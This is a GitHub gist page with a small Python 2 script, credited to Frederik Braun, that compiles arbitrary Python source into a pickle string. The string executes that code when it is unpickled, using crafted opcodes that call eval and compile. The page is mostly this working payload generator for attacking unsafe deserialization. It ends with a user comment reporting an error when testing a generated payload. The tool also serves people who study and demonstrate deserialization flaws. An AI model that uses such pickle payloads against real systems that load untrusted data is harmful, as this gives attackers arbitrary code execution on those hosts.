Last active
February 21, 2025 07:21
python pickle compiler
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## compile arbitrary python source code into pickle | |
| ## format. will execute on unpickling. | |
| ## | |
| ## Author: Frederik Braun, Jun 2011 | |
| ## Contact: <fb(AT)frederik-braun.com> | |
| ## Licence: WTFPL | |
| ## Python 2.7x | |
| try: | |
| import cPickle as pickle | |
| except ImportError: | |
| import pickle | |
| from sys import argv | |
| def picklecompiler(sourcefile): | |
| """ | |
| Usually pickle can only be used to (de)serialize objects. | |
| This tiny snippet will allow you to transform arbitrary python source | |
| code into a pickle string. Unpickling this string with pickle.loads() | |
| will execute the given soruce code. | |
| The trick is actually prettey easy: Usually eval() will only accept | |
| expressions, thus class and function declarations does not work. | |
| Using the work-around of code objects (returned by compile()), we can | |
| execute real python source code :) | |
| """ | |
| sourcecode = file(sourcefile).read() | |
| return "c__builtin__\neval\n(c__builtin__\ncompile\n(%sS'<payload>'\nS'exec'\ntRtR." % (pickle.dumps( sourcecode )[:-4],) | |
| def usage(): | |
| print "usage: ./%s file\n\nfile\tfile to compile into a pickle string" % argv[0] | |
| if len(argv) == 2: | |
| print repr(picklecompiler(argv[1])) | |
| else: | |
| usage() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
hello,I try to use this script to pickle my code:
got the payload, and save it to poc.pickle:
but when I try to test the payload with the following code:
I got error:
my question is:
if I am not misunderstood ,this script should support to execute any python code.
but the error is about the function,maybe some issue.
hope your response,thanks!